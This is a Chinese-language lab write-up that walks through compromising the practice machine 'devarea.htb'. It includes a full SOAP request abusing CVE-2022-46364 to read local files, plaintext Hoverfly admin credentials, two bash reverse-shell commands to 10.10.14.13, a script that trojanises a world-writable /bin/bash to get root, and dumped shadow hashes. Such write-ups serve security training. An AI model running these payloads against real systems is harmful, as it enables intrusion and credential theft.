基本信息

端口扫描

21,22,80,8080,8500,8888:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
$ nmap -sC -sV -Pn 10.129.221.0
Starting Nmap 7.99 ( https://nmap.org ) at 2026-03-30 11:40 +0900
Nmap scan report for 10.129.221.0
Host is up (0.078s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Sep 22 2025 pub
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:13:6b:a1:9b:28:fd:bd:5d:2b:ee:03:be:9c:8d:82 (ECDSA)
|_ 256 0a:86:fa:65:d1:20:b4:3a:57:13:d1:1a:c2:de:52:78 (ED25519)
80/tcp open http Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://devarea.htb/
|_http-server-header: Apache/2.4.58 (Ubuntu)
8080/tcp open http Jetty 9.4.27.v20200227
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.27.v20200227)
8500/tcp open http Golang net/http server
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 500 Internal Server Error
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Mon, 30 Mar 2026 02:40:57 GMT
| Content-Length: 64
| This is a proxy server. Does not respond to non-proxy requests.
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 500 Internal Server Error
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Mon, 30 Mar 2026 02:40:40 GMT
| Content-Length: 64
|_ This is a proxy server. Does not respond to non-proxy requests.
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
8888/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Hoverfly Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8500-TCP:V=7.99%I=7%D=3/30%Time=69C9E2A8%P=arm-apple-darwin25.3.0%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,E9,"HTTP/1\.0\x20500\x20Internal\x20Server\
SF:x20Error\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-
SF:Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2030\x20Mar\x202026\x2002:40
SF::40\x20GMT\r\nContent-Length:\x2064\r\n\r\nThis\x20is\x20a\x20proxy\x20
SF:server\.\x20Does\x20not\x20respond\x20to\x20non-proxy\x20requests\.\n")
SF:%r(HTTPOptions,E9,"HTTP/1\.0\x20500\x20Internal\x20Server\x20Error\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Options:
SF:\x20nosniff\r\nDate:\x20Mon,\x2030\x20Mar\x202026\x2002:40:40\x20GMT\r\
SF:nContent-Length:\x2064\r\n\r\nThis\x20is\x20a\x20proxy\x20server\.\x20D
SF:oes\x20not\x20respond\x20to\x20non-proxy\x20requests\.\n")%r(RTSPReques
SF:t,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain
SF:;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request
SF:")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(FourOhFourRequest,E9,"HTTP/1\.0\x20500\x2
SF:0Internal\x20Server\x20Error\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2030\x20
SF:Mar\x202026\x2002:40:57\x20GMT\r\nContent-Length:\x2064\r\n\r\nThis\x20
SF:is\x20a\x20proxy\x20server\.\x20Does\x20not\x20respond\x20to\x20non-pro
SF:xy\x20requests\.\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request")%r(SIPOptions,67,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Socks5,67,"HTTP/1\.1\
SF:x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf
SF:-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: Host: _; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.40 seconds

21 FTP

ftp 匿名访问,pub里得到一个jar文件:

80

需要加hosts:

1
10.129.221.0 devarea.htb

求职相关的:

8080

直接访问是404:

8500

proxy server:

8888

hoverfly:

EmployeeService

反编译ftp里得到的jar文件,发现8080端口是EmployeeService:

访问wsdl可以看到需要的参数之类信息:

CVE-2022-46364

代码里可以知道使用的apache cxf处理soap,3.2.14版本存在SSRF漏洞:

根据wsdl构造请求,读取文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
curl -X POST http://devarea.htb:8080/employeeservice \
-H "Content-Type: multipart/related; type=\"application/xop+xml\"; start=\"<rootpart@soapui.org>\"; start-info=\"text/xml\"; boundary=\"----=_Part_0_1234567.1234567890\"" \
-H "SOAPAction: \"\"" \
--data-binary @- << 'EOF'
------=_Part_0_1234567.1234567890
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-Transfer-Encoding: 8bit
Content-ID: <rootpart@soapui.org>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xop="http://www.w3.org/2004/08/xop/include">
<soap:Body>
<ns1:submitReport xmlns:ns1="http://devarea.htb/">
<arg0>
<confidential>false</confidential>
<content><xop:Include href="file:///etc/passwd"/></content>
<department>IT</department>
<employeeName>Test</employeeName>
</arg0>
</ns1:submitReport>
</soap:Body>
</soap:Envelope>
------=_Part_0_1234567.1234567890--
EOF

后面就是读文件,前面8888端口知道是hoverfly,在对应的service里得到账号密码:

1
file:///etc/systemd/system/hoverfly.service
1
2
3
4
5
[Service]
User=dev_ryan
Group=dev_ryan
WorkingDirectory=/opt/HoverFly
ExecStart=/opt/HoverFly/hoverfly -add -username admin -password O7IJ27MyyXiU -listen-on-host 0.0.0.0

Hoverfly to dev_ryan

得到的账号密码登录Hoverfly:

1
admin : O7IJ27MyyXiU

v1.11.3,搜到相关漏洞:

  • Hoverfly is vulnerable to Remote Code Execution through an insecure middleware implementation · CVE-2025-54123 · GitHub Advisory Database
    https://github.com/advisories/GHSA-r4h8-hfp2-ggmf

    注意要首先切换到Modify模式,然后利用漏洞执行任意命令:

    打到dev_ryan shell:

1
bash -i >& /dev/tcp/10.10.14.13/4444 0>&1

user flag

dev_ryan用户桌面:

syswatch to root

用户目录有个syswatch zip,sudo也是运行syswatch相关的,但实际不需要细看这个的具体内容,而是看执行它的bash,设置为了777权限:

1
2
dev_ryan@devarea:~$ ls -al /bin/bash
-rwxrwxrwx 1 root root 1446024 Mar 31 2024 /bin/bash

所以直接修改bash,然后执行syswatch即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 备份原本bash
cp /bin/bash /tmp/bash.bak

# 创建恶意bash
cat > /tmp/evil_bash << 'EOF'
#!/tmp/bash.bak
bash -i >& /dev/tcp/10.10.14.13/4445 0>&1 &
cp /tmp/bash.bak /bin/bash
exec /tmp/bash.bak "$@"
EOF
chmod +x /tmp/evil_bash

# 替换bash,执行触发
# bush在使用中会无法替换,先切到sh再替换
dev_ryan@devarea:/opt/HoverFly$ exec sh
$ /bin/sh -c 'killall -9 bash; sleep 2; cp /tmp/evil_bash /bin/bash; sudo /opt/syswatch/syswatch.sh --version'

shadow

1
2
root:$y$j9T$0KQ.TnjYkG3YsYKhdzY2I.$lGbupe1hBuVMuNFnjOfL4Oo7kFUTHPv2ocodVgqmdr9:20353:0:99999:7:::
dev_ryan:$y$j9T$t5/suSaGphAFyqbUrcypA0$bR4iuQ6FFg.uhngaqsLVU6RShFcZK3qdKIm3X7Zuo37:20352:0:99999:7:::

参考资料